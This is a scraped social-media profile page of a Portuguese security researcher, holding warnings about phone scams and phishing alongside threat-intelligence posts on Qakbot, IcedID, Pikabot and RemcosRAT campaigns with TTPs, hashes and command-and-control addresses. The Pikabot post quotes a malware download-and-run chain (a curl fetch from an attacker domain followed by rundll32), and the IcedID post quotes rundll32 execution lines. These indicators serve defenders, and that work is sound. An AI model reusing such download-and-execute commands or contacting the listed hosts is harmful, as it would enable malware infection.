MoshsrV 🤘 🇵🇹
@moshsrv
Followers
764
Following
3K
Media
278
Statuses
956
0-Day's, Anti-Malware, Anti-phishing, Metal Fan, guitar player No bot's allowed.
Lisbon, Portugal
Joined August 2009
👀👇🏻
🚨Nova situação de BURLA através de chamadas telefónicas. O suspeito fala em inglês e informa a vítima que tem um problema judicial/policial pendente e que, para o resolver, terá de pagar uma multa ou fiança. NÃO FAÇA NENHUMA TRANSFERÊNCIA NEM FORNEÇA DADOS PESSOAIS. @psplisboa
1
5
24
@Dropbox #phishing in a #Hungarian site URL(https): /passed.hu/wp-includes/3110a.html @urlscanio
https://t.co/wZCau4Z859
@whitehoodie4 @PhishStats @ActorExpose
1
2
3
👀👇🏻
0
3
13
Another #Qakbot MSI Infection 🚨 Similar #DFIR Exec Flow and #TTPs [+] Rundll32 T1218.011 - %AppData%\AdobeAC.dll,EditOwnerInfo [+] PH T1055.012 - (Injected Processes: wermgr.exe, backgroundTaskHost.exe, dxdiag.exe) [+] Internal DLL name: EditOwnerInfo.dll🔥
#Qakbot Resurrection #TTPs & #DFIR🦆 Exec Flow: MSI > [msiexec] > Rundll32 > Rundll32 > wermgr (Injected Process) [+] Msiexec T1218.007 [+] Rundll32 T1218.011 - %AppData%\KROST.dll,hvsi [+] PH T1055.012 - wermgr.exe [+] Internal DLL name: HvsiManagementApi.dll🔥
3
52
116
The customer contacted us because "Microsoft 365 Defender has detected a security threat", more precisely, the alert "Anomalous Token involving one user" was raised. We tasked the customer to give us access to their Azure Tenant so that we could investigate the logins and
19
107
589
🚨🚨🚨 Help 🚨🚨🚨 Atenção a estes pedidos de donativos para "comida a uma menina pequena"...
0
5
19
#IcedID - #TA577 - url > .img > .lnk > .dll cmd /c UPDATE.html.lnk rundll32 version1.dll, scab rundll32 C:\Users\u\AppData\Roaming\Custom_update\Update_4163f3ac.dll, scab c2's https://riverhasus.]com/live/
https://mazdakrichest.]com/live/ IOC's https://t.co/2jZDhivW3q
1
32
79
🚨 Malicious Excel File Evaded Nearly All The AV Solutions 🚨 ⚠ Heavily Size and Obfuscated Malicious VBA Code ⚠ 📌 VT Detection: 7 / 62 📁 Filename: Approved Visit Prog of ACNS(M).xls 🔐 MD5: 3711538e51cef1d983f3e9127092e03c 🕵️♂️ IOCs: wild[.]craftupdate[.]online DOCGuard
5
8
39
8
53
243
"Comitato di monitoraggio dell'anagrafe tributaria" spam email @Agenzia_Entrate 🔥switch to #systemBc ⚠️ from #remcosrat 🌪️ 🌀Anyrun https://t.co/yL5aY8U8p6 ❇️Samples https://t.co/kADezqouc8
"Comitato di monitoraggio dell'anagrafe tributaria" spam email @Agenzia_Entrate spread #RemCosRat EML>LNK>ZIP>URL>SMB>ZIP>VHD>dll sideloading via Baidu PC Faster Samples https://t.co/kADezqouc8 Urls https://t.co/N5ISI7dwf0 SMB 62.173.141.11*4 *6 *8 Run https://t.co/foHVHiDPOT
2
10
19
🚨 Facebook 🚨 Cuidado com estes emails, de pretensas tentativas de entrar na vossa conta do Facebook… Serve apenas para te roubar a conta!
1
11
25
#Pikabot - #TA577 - url > .zip > .js > curl > .ps > .dll wscript.exe JYIPY.js cmd /c CuRL https://frensterol.]com/yveu/stati -o %TmP%\SlobberShoddily.conf rundll32 %TmP%\SlobberShoddily.conf Throw c2's 45.32.232.31:13782 158.247.196.155:9785 IOC's https://t.co/kWms7me94t
1
30
81
🚨 Malicious CHM File Evaded Nearly All The AV Solutions 🚨 📌 VT Detection: 7/60 📁 Filename: [HF].chm 🔐 MD5: f35b05779e9538cec363ca37ab38e287 🕵️♂️ IOCs: niscarea[.]com 👉 DOCGuard Report: https://t.co/8zWSwQIWnX
1
4
23
🚨🚨🚨 MBWAY 🚨🚨🚨 Mais uma página falsa a tentar roubar-te 👇🏻
0
11
24
Introducing THOR-Cloud Lite 🌩️: Seamless On-Demand Forensic Scanning Made Easy - apply YARA + Sigma + IOCs - it's free - many more features upcoming Blog 📘 https://t.co/rXgf3DUUso Release Session 📺 https://t.co/ynWU2wrewd Register for Free ⚡️ https://t.co/wazEjbN014
12
163
526
